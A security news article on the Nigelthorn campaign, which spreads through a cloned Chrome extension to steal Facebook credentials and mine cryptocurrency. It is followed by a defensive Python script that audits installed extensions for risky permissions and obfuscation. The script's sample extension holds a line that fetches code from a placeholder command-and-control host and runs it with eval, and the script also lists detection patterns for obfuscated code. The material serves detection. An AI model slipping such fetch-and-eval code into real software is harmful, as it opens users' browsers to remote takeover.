New Nigelthorn Malware Steals Facebook Credentials & Mines Digital Money

A new strain of malware named Nigelthorn has already infected more than 100,000 computers in 100 countries by abusing a Chrome extension known as Nigelify. The countries most affected are Venezuela, the Philippines and Ecuador. The malware can steal Facebook login credentials from the victim’s machine, commit click fraud, mine cryptocurrency and carry out other malicious activity. According to security researchers, the group behind the Nigelthorn campaign has been active since March 2018.

Security investigators found that the threat propagates through malicious links promoted on Facebook: targeted users are redirected to a bogus YouTube page that asks them to download and install a Google Chrome extension in order to play the video. Once the victim accepts the installation, the Nigelthorn payload lands on the machine and begins its malicious activity. Because it operates through the Google Chrome browser, Nigelthorn is built to target both Windows and Linux systems.


After clicking the ‘Add Extension’ option, the victim is redirected to a Bitly URL, which in turn reroutes them to Facebook to lure them into entering their Facebook login credentials. Furthermore, the attackers behind Nigelthorn copied legitimate Chrome extensions and added a short but obfuscated malicious script to each copy. Once the malicious extension is installed, the malicious JavaScript runs and starts the attack by downloading the malware’s configuration from its command-and-control server.

Nigelthorn then issues a set of requests from the affected machine. The threat can steal Instagram cookies and Facebook login credentials. It also redirects the compromised user to a Facebook API to generate an access token, which is then sent to the attackers’ command-and-control server. Using the stolen credentials, Nigelthorn spreads itself: the attackers send the malicious links in messages to the victim’s Facebook friends or publish a new post tagging almost 50 contacts.


Nigelthorn can also download cryptocurrency-mining software onto the victim’s machine to mine digital currency with the affected system’s resources. The malicious JavaScript that controls the mining tool is downloaded from external domains. According to a recent researcher report, the threat actors attempt to mine three popular cryptocurrencies, Bitcoin, Monero and Electroneum, using the ‘CryptoNight’ algorithm, which allows mining on any CPU. In addition, Nigelthorn downloads a fake YouTube plug-in to collect payments from YouTube and to persist longer on the affected machine without its presence being noticed.
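To make the extension traits described above concrete from a defender’s side, here is an added example (not code from the article or from the researchers it cites) that audits unpacked Chrome extensions on a workstation. It flags the cookies and tabs permissions and broad host access that a credential-stealing copy of a legitimate extension needs, a content security policy that permits unsafe-eval, obfuscation markers such as atob() and eval() in the bundled scripts, and JavaScript that fetches code or configuration from an external URL, as the C2 configuration download and the externally hosted mining script do in this campaign. The permission list and obfuscation heuristics are assumptions of the example, and the sample extension, its ID and its C2 domain are constructed placeholders.

```python
"""Audit unpacked Chrome extensions for permission, CSP, obfuscation and
remote-fetch traits. Constructed defender example; the heuristics below are
assumptions for triage, not a detection signature for Nigelthorn."""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Permissions a reviewer would want justified (assumed list, not from the article).
SENSITIVE_PERMISSIONS = {"cookies", "tabs", "webRequest", "webRequestBlocking",
                         "history", "management", "nativeMessaging", "proxy", "debugger"}
# Host patterns that grant access to every site the user visits.
BROAD_HOST = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")
# Assumed indicators of obfuscated or dynamically evaluated JavaScript.
OBFUSCATION_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\batob\s*\("), "atob() decoding"),
    (re.compile(r"\bunescape\s*\("), "unescape()"),
    (re.compile(r"String\.fromCharCode\s*\("), "fromCharCode decoding"),
    (re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"), "long hex-escaped string"),
]
# Script or config pulled from a URL at runtime instead of shipped in the package.
REMOTE_FETCH = re.compile(r"""(?:\bsrc\s*=\s*|importScripts\(\s*|fetch\(\s*)["'](https?://[^"']+)""")


def scan_script(text: str) -> List[str]:
    """Return human-readable findings for one JavaScript source file."""
    findings = [label for pattern, label in OBFUSCATION_PATTERNS if pattern.search(text)]
    findings += [f"remote code/config fetch: {url}" for url in REMOTE_FETCH.findall(text)]
    return findings


def audit_manifest(manifest: dict) -> List[str]:
    """Flag permissions and CSP settings that widen what the extension can do."""
    findings = []
    # MV2 lists hosts under "permissions"; MV3 moves them to "host_permissions".
    for perm in manifest.get("permissions", []) + manifest.get("host_permissions", []):
        if not isinstance(perm, str):
            continue
        if perm in SENSITIVE_PERMISSIONS:
            findings.append(f"sensitive permission: {perm}")
        elif BROAD_HOST.match(perm):
            findings.append(f"broad host access: {perm}")
    csp = manifest.get("content_security_policy")
    if isinstance(csp, str) and "unsafe-eval" in csp:
        findings.append("CSP allows unsafe-eval")
    return findings


def audit_extension_dir(ext_dir: Path) -> Dict[str, object]:
    """Audit one unpacked extension directory (the one holding manifest.json)."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = audit_manifest(manifest)
    for js in sorted(ext_dir.rglob("*.js")):
        for finding in scan_script(js.read_text(encoding="utf-8", errors="ignore")):
            findings.append(f"{js.relative_to(ext_dir)}: {finding}")
    return {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
            "findings": findings, "risk": len(findings)}


def audit_profile(extensions_root: Path) -> List[Dict[str, object]]:
    """Walk <profile>/Extensions/<id>/<version>/ and rank installs by finding count."""
    results = [audit_extension_dir(m.parent) for m in sorted(extensions_root.rglob("manifest.json"))]
    return sorted(results, key=lambda r: r["risk"], reverse=True)


def build_sample_extension(root: Path) -> Path:
    """Write a constructed look-alike extension carrying the traits described above."""
    ext_dir = root / "Extensions" / "constructedid0000000000000000000" / "1.0_0"
    ext_dir.mkdir(parents=True)
    manifest = {
        "manifest_version": 2,
        "name": "Nigelify look-alike (constructed sample)",
        "version": "1.0",
        "permissions": ["cookies", "tabs", "<all_urls>", "storage"],
        "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
        "background": {"scripts": ["bg.js"]},
    }
    (ext_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (ext_dir / "bg.js").write_text(
        '// constructed: decode a blob, then pull and run config from a placeholder C2\n'
        'var cfg = JSON.parse(atob("e30="));\n'
        'fetch("https://c2.placeholder.invalid/cfg").then(function (r) { return r.text(); })\n'
        '  .then(function (s) { eval(s); });\n',
        encoding="utf-8")
    return ext_dir


def demo() -> Dict[str, object]:
    """Build the sample in a temporary profile, audit it and return the top result."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_extension(Path(tmp))
        return audit_profile(Path(tmp) / "Extensions")[0]


if __name__ == "__main__":
    result = demo()
    print(f'{result["name"]} {result["version"]}: {result["risk"]} finding(s)')
    for line in result["findings"]:
        print("  -", line)
```

On a real machine, point `audit_profile` at the browser profile’s `Extensions` directory (for example `Default/Extensions` under the Chrome user data directory) and review the highest-ranked entries first. A finding is a triage signal rather than a verdict: many legitimate extensions need tabs or cookies access, so the useful signal is the combination of broad host access, decoding plus eval of fetched data, and a fetch target that is not the vendor’s own domain.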
